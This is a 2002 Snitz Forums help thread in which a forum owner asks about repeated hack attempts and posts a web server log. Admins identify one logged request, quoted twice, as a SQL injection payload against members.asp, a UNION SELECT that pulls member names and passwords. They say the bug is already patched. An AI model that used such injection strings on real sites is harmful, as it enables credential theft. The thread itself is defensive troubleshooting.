| Author |
 Topic  |
|
|
Romee
Junior Member
Netherlands
180 Posts |
 Posted - 03 July 2002 : 12:01:18
|
Like many others I get many hack attacks from ip 195.175.240.207
I am aware of that since I installed the Ozroot Hackmod.
In active users mod (4o.04) I can see that these people have a special interest in the activepolls.asp (poll_mod_33) of the page that is on my forum. Could this be vulnerable?
R.
|
|
|
Davio
Development Team Member
Jamaica
12217 Posts |
Posted - 03 July 2002 : 17:33:32
|
There is nothing to input on that page. It doesn't take anything from the url and it doesn't have any text fields. So to answer your question: no.
«------------------------------------------------------»
What new features are going to be in the 3.4
version? See the 3.4 UnOfficial Features List ! |
 |
|
|
Romee
Junior Member
Netherlands
180 Posts |
Posted - 03 July 2002 : 18:13:36
|
Thanks Davio. 
I studied it myself to, couldn't find anything, but the ongoing interest of these hackers made me uncertain.
Romée
|
|
|
|
dayve
Forum Moderator
USA
5820 Posts |
Posted - 03 July 2002 : 21:56:45
|
quote:
Like many others I get many hack attacks from ip 195.175.240.207
please elaborate why you would say many hack attacks come from this IP.
http://www.nineinchnailz.com |
|
|
|
Romee
Junior Member
Netherlands
180 Posts |
Posted - 05 July 2002 : 04:32:38
|
I don't know if I understand what you mean.
I installed the Ozroot-hackmod and since theat moment, some weeks ago, I am noticed by e-maiil that this IP tries to hack me. (Yesterday, the day before yesterday etc). I have read on the Snitzforum that this same IP has tried it all around.
Besides all the securitypatches that I installed as soon as they were available, I thought, what about the mods. Are they vulnerable. And the more so, since this IP was most of the time on pages that are connected with the eventsmod or pollmod.
Then I read on the Snitzforum some days ago about sql injection. I found many articles on the internet about it and I realised that this was another new subject I had to take care of, since I used my forumdatabase for many other purposes. The login procedure I used (checking the membernames/passwords in the db), happened to be a piece of cake for sql injection. I immediately changed that.
When you ask me "why I say" this:
Because our forum means so much for me. I work very hard for it and I don't want other people to harm it.
When you ask "why this ip", it is because this is the only real attacker I got.
Or is your remark about calling the ip number as such. You might be right on that one. It is what many say about hooligans, don't give them a name in the paper, that is what they want.
In general. Many of you are good developpers, I am not. I try to understand what you do, and it gives me a lot of profit. I met some very nice people here, that helped me enormously. I have this feeling of me in the taking position, and not knowing what to do in reverse.
Insecure and asking for reassurance, I am afraid that is what it comes to when I elaborate on this.
But perhaps I miss your point.
Romée
|
|
|
|
HuwR
Forum Admin
United Kingdom
20584 Posts |
Posted - 05 July 2002 : 07:15:32
|
Romee,
can you post part of your log files here, we can then see what they were trying to do, and give you better advice maybe.
|
|
|
|
Romee
Junior Member
Netherlands
180 Posts |
Posted - 05 July 2002 : 08:16:20
|
Thanks HuwR,
I downloaded my logfile, opened it with wordpad and took for example july 3 (he visited me today also):
(I replaced some info with the word away, and hope that the remaining doesn't harm me).
2002-07-03 15:26:23 195.175.240.207 - AWAY GET /forum/active_polls.asp - 200 0 0 298 5408 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - http://www.alltheweb.com/search?q=snitz+forums&c=web&o=20&l=nl&cs=utf-8
2002-07-03 15:26:36 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/webredactie.gif - 200 0 1139 348 3355 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:37 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/imkerforum.gif - 200 0 918 347 1192 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:39 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/archieven.gif - 200 0 1540 346 1752 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:39 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/media.gif - 200 0 1388 342 1893 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:40 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/kennis.gif - 200 0 1412 343 1252 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:40 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/projecten.gif - 200 0 864 346 1071 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:40 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/chat.gif - 200 0 1299 341 841 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:41 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/links.gif - 200 0 1333 342 862 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:41 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/agenda.gif - 200 0 1450 343 892 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:41 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/home.gif - 200 0 820 341 871 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:42 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/shim.gif - 200 0 287 341 681 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:44 195.175.240.207 - AWAY GET /forum/Lang1043button_login.gif - 200 0 1989 338 2002 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:44 195.175.240.207 - AWAY GET /assets/afbeeldingen/logoforum.jpg - 200 0 5791 341 2514 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:44 195.175.240.207 - AWAY GET /forum/icon_folder_open.gif - 200 0 382 334 732 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:44 195.175.240.207 - AWAY GET /forum/icon_bar.gif - 200 0 290 326 651 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:45 195.175.240.207 - AWAY GET /forum/icon_folder_new.gif - 200 0 376 333 861 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:45 195.175.240.207 - AWAY GET /forum/icon_go_up.gif - 200 0 376 328 841 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:27:34 195.175.240.207 - AWAY GET /forum/members.asp mode=search&M_NAME=FisH%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_PASSWORD%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method= 200 0 0 669 570 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ -
|
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 05 July 2002 : 08:23:35
|
Romée,
It doesn't like he is trying anything with the active polls. He is trying the old members.asp bug though, but that has long been fixed. I see nothing that you should be worried about here.
Regardless of this you should keep a backup of your DB (I think you do). Not because of the hacking, but that's just a precautionary measure everyone should take.
-------------------------------------------------
Installation Guide | Do's and Dont's | MODs
Edited by - ruirib on 05 July 2002 08:25:41 |
|
|
|
HuwR
Forum Admin
United Kingdom
20584 Posts |
Posted - 05 July 2002 : 08:25:41
|
well, this bit is definately a hack attempt
2002-07-03 15:27:34 195.175.240.207 - AWAY GET /forum/members.asp mode=search&M_NAME=FisH%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_PASSWORD%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method= 200 0 0 669 570 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ -
on your members.asp
|
|
|
|
Romee
Junior Member
Netherlands
180 Posts |
Posted - 05 July 2002 : 08:29:53
|
Thanks, Rui and HuwR,
Gives a nice feeling that they try the thing that I patched, and also that you took the effort,
Romée
|
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
Gremlin
General Help Moderator
New Zealand
7528 Posts |
Posted - 05 July 2002 : 10:03:17
|
Had a hack attempt from that same IP address myself yesterday too.
www.daoc-halo.com |
|
|
|
Hamlin
Advanced Member
United Kingdom
2386 Posts |
Posted - 05 July 2002 : 10:21:53
|
Ahh my simple mind cant get cope with this. If its the same IP, it does not mean the same person, i know that..but Romee said:
quote:
Like many others I get many hack attacks from ip 195.175.240.207
So i assume that means more than one..maybe by the same person. But why try more than once..if it does not work the first time why would it work the second or 3rd time... 
I feel sorry for people who don't drink. When they wake up in the morning, that's as good as they're going to feel all day.
--Frank Sinatra |
|
|
|
HuwR
Forum Admin
United Kingdom
20584 Posts |
Posted - 05 July 2002 : 10:29:13
|
Hamlin,
in the log extratc that romee posted, there is only one hack attempt, all the other lines are merely server requests for the images which make up romees pages, they are perfectly normal and what you would expect to see in a log, every time someone connects to a page you will get 10's of requests for all it's items, that is normal.
|
|
|
|
Romee
Junior Member
Netherlands
180 Posts |
Posted - 05 July 2002 : 11:49:07
|
I think Hamlin means that the same hackattempt from this ip is repeated many days. In my log I can trace the same attempt again and again. That surprised me also.
Romée
|
|
|
|
Davio
Development Team Member
Jamaica
12217 Posts |
Posted - 05 July 2002 : 14:40:10
|
You guys are assuming that these people who try to hack your forum have sense.
«------------------------------------------------------»
What new features are going to be in the 3.4
version? See the 3.4 UnOfficial Features List ! |
|
|
| |
Topic |
|
Topic Locked
